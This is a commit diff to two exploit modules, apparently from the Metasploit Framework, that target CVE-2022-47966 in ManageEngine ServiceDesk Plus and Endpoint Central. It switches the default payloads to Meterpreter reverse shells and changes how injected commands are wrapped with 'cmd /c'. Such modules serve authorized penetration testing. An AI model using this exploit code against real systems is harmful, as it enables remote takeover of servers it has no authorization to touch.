Update manageengine_endpoint_central and servicedesk_plus default payloads

errorxyz · errorxyz · commit 97513d473f08 · 2024-02-23T00:00:18.000+05:30
diff --git a/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb b/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb
@@ -65,7 +65,7 @@ def initialize(info = {})
               'Platform' => 'win',
               'Arch' => ARCH_CMD,
               'Type' => :windows_command,
-              'DefaultOptions' => { 'Payload' => 'cmd/windows/powershell/meterpreter/reverse_tcp' },
+              'DefaultOptions' => { 'Payload' => 'cmd/windows/https/x64/meterpreter/reverse_tcp' },
               'Payload' => { 'BadChars' => "\x27" }
             }
           ],
@@ -200,7 +200,7 @@ def trigger_urlclassloader
 
   def execute_command(cmd, _opts = {})
     case target['Type']
-    when :windows_dropper
+    when :windows_dropper, :windows_command
       cmd = "cmd /c #{cmd}"
     when :unix_cmd, :linux_dropper
       cmd = cmd.gsub(' ') { '${IFS}' }
diff --git a/modules/exploits/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966.rb b/modules/exploits/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966.rb
@@ -46,7 +46,7 @@ def initialize(info = {})
               'Type' => :java,
               'Platform' => 'java',
               'Arch' => ARCH_JAVA,
-              'DefaultOptions' => { 'Payload' => 'java/shell_reverse_tcp' }
+              'DefaultOptions' => { 'Payload' => 'java/meterpreter/reverse_tcp' }
             },
           ],
           [
@@ -65,7 +65,7 @@ def initialize(info = {})
               'Platform' => 'win',
               'Arch' => ARCH_CMD,
               'Type' => :windows_command,
-              'DefaultOptions' => { 'Payload' => 'cmd/windows/powershell/meterpreter/reverse_tcp' },
+              'DefaultOptions' => { 'Payload' => 'cmd/windows/https/x64/meterpreter/reverse_tcp' },
               'Payload' => { 'BadChars' => "\x27" }
             }
           ]
@@ -179,9 +179,7 @@ def trigger_urlclassloader
   end
 
   def execute_command(cmd, _opts = {})
-    if target['Type'] == :windows_dropper
-      cmd = "cmd /c #{cmd}"
-    end
+    cmd = "cmd /c #{cmd}"
     cmd = cmd.encode(xml: :attr).gsub('"', '')
 
     vars = Rex::RandomIdentifier::Generator.new({ language: :java })
